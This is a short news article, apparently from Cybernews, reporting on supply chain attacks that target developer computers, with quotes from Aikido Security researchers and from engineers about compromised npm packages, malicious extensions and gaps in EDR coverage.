As supply chain attacks rage, one engineering team reported a 7-fold spike in vulnerable dependencies over 3 months. Developer computers have become the prime targets for attackers – many open doors, and malicious code bypasses Endpoint Detection and Response tools, giving hackers the highest return for the effort.
Aikido Security researchers have warned developers that their systems are now the highest-ROI targets, and supply chain attacks reflect that.
Gavin Williams, Engineering Manager at AI procurement platform provider Omnea, reported facing a 7-fold increase in supply chain vulnerabilities over just 3 months.
“It’s so easy for developers to install a vulnerable package or something that’s been compromised,” Williams said.
From compromised Trivy, TanStack, or LiteLLM and hundreds of other npm packages, to malicious VS Code extensions – all supply chain attacks open the doors for attackers to developer workstations.
“They all share one key factor. They’re targeting the developer device. And it's working,” the Aikido researchers warn in a report.
The main reason is that developer computers often remain largely unmonitored because traditional detection and management tools interfere with their workflow. EDR tools are also nearly blind to what’s going on inside developer tools – they don’t flag NPM packages, IDE extensions, Chrome plugins, or Cursor skills.
One slip, and a single malicious package can run a post-install script to exfiltrate all credentials before the developer realizes.
“A lot of people are living in the terminal now, and they’re installing lots of markdown files and other things. However, naturally, without any verified processes, there’s nothing stopping them from downloading things that they’ve seen on Reddit or X. These could be part of a malware campaign to get people to download it. And then – the rest is history,” the report quotes Walid Mahmoud, DevSecOps lead in the UK public sector.
Artificial intelligence tools have dramatically lowered the barrier to creating and spreading malware.
Aikido promotes its products to address the blind spot of traditional EDR tools and suggests that package-level scanning tools can serve as a first line of defense.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked